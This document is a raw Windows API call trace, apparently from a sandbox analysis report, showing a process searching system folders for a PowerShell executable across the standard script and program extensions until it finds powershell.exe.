	[0693.563] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.563] SetErrorMode (uMode=0x1) returned 0x1
	[0693.563] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.297] SetErrorMode (uMode=0x1) returned 0x1
	[0702.297] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.297] SetErrorMode (uMode=0x1) returned 0x1
	[0702.298] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.298] SetErrorMode (uMode=0x1) returned 0x1
	[0702.298] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.298] SetErrorMode (uMode=0x1) returned 0x1
	[0702.298] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.298] SetErrorMode (uMode=0x1) returned 0x1
	[0702.299] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.299] SetErrorMode (uMode=0x1) returned 0x1
	[0702.299] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.299] SetErrorMode (uMode=0x1) returned 0x1
	[0702.299] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.300] SetErrorMode (uMode=0x1) returned 0x1
	[0702.300] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.300] SetErrorMode (uMode=0x1) returned 0x1
	[0702.300] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.300] SetErrorMode (uMode=0x1) returned 0x1
	[0702.300] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.301] SetErrorMode (uMode=0x1) returned 0x1
	[0702.301] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.301] SetErrorMode (uMode=0x1) returned 0x1
	[0702.301] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.301] SetErrorMode (uMode=0x1) returned 0x1
	[0702.302] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.302] SetErrorMode (uMode=0x1) returned 0x1
	[0702.302] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.302] SetErrorMode (uMode=0x1) returned 0x1
	[0702.302] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.302] SetErrorMode (uMode=0x1) returned 0x1
	[0702.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.303] SetErrorMode (uMode=0x1) returned 0x1
	[0702.303] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.303] SetErrorMode (uMode=0x1) returned 0x1
	[0702.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.304] SetErrorMode (uMode=0x1) returned 0x1
	[0702.304] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.304] SetErrorMode (uMode=0x1) returned 0x1
	[0702.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.304] SetErrorMode (uMode=0x1) returned 0x1
	[0702.304] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.305] SetErrorMode (uMode=0x1) returned 0x1
	[0702.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.305] SetErrorMode (uMode=0x1) returned 0x1
	[0702.305] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.305] SetErrorMode (uMode=0x1) returned 0x1
	[0702.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.306] SetErrorMode (uMode=0x1) returned 0x1
	[0702.306] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.306] SetErrorMode (uMode=0x1) returned 0x1
	[0702.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.306] SetErrorMode (uMode=0x1) returned 0x1
	[0702.306] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.307] SetErrorMode (uMode=0x1) returned 0x1
	[0702.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.307] SetErrorMode (uMode=0x1) returned 0x1
	[0702.307] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.307] SetErrorMode (uMode=0x1) returned 0x1
	[0702.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.308] SetErrorMode (uMode=0x1) returned 0x1
	[0702.308] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.308] SetErrorMode (uMode=0x1) returned 0x1
	[0702.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.308] SetErrorMode (uMode=0x1) returned 0x1
	[0702.309] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.309] SetErrorMode (uMode=0x1) returned 0x1
	[0702.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.309] SetErrorMode (uMode=0x1) returned 0x1
	[0702.309] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.309] SetErrorMode (uMode=0x1) returned 0x1
	[0702.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.310] SetErrorMode (uMode=0x1) returned 0x1
	[0702.310] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.310] SetErrorMode (uMode=0x1) returned 0x1
	[0702.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.311] SetErrorMode (uMode=0x1) returned 0x1
	[0702.311] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.311] SetErrorMode (uMode=0x1) returned 0x1
	[0702.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.311] SetErrorMode (uMode=0x1) returned 0x1
	[0702.311] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.312] SetErrorMode (uMode=0x1) returned 0x1
	[0702.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.312] SetErrorMode (uMode=0x1) returned 0x1
	[0702.312] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.312] SetErrorMode (uMode=0x1) returned 0x1
	[0702.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.313] SetErrorMode (uMode=0x1) returned 0x1
	[0702.313] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.313] SetErrorMode (uMode=0x1) returned 0x1
	[0702.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.313] SetErrorMode (uMode=0x1) returned 0x1
	[0702.314] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.314] SetErrorMode (uMode=0x1) returned 0x1
	[0702.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.314] SetErrorMode (uMode=0x1) returned 0x1
	[0702.314] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.315] SetErrorMode (uMode=0x1) returned 0x1
	[0702.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.315] SetErrorMode (uMode=0x1) returned 0x1
	[0702.315] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.315] SetErrorMode (uMode=0x1) returned 0x1
	[0702.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.316] SetErrorMode (uMode=0x1) returned 0x1
	[0702.316] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.316] SetErrorMode (uMode=0x1) returned 0x1
	[0702.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.316] SetErrorMode (uMode=0x1) returned 0x1
	[0702.316] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x4ef050
	[0702.318] FindNextFileW (in: hFindFile=0x4ef050, lpFindFileData=0x1c81df50 | out: lpFindFileData=0x1c81df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0702.318] FindClose (in: hFindFile=0x4ef050 | out: hFindFile=0x4ef050) returned 1
	[0702.318] SetErrorMode (uMode=0x1) returned 0x1
	[0702.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c81e060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0702.319] SetErrorMode (uMode=0x1) returned 0x1
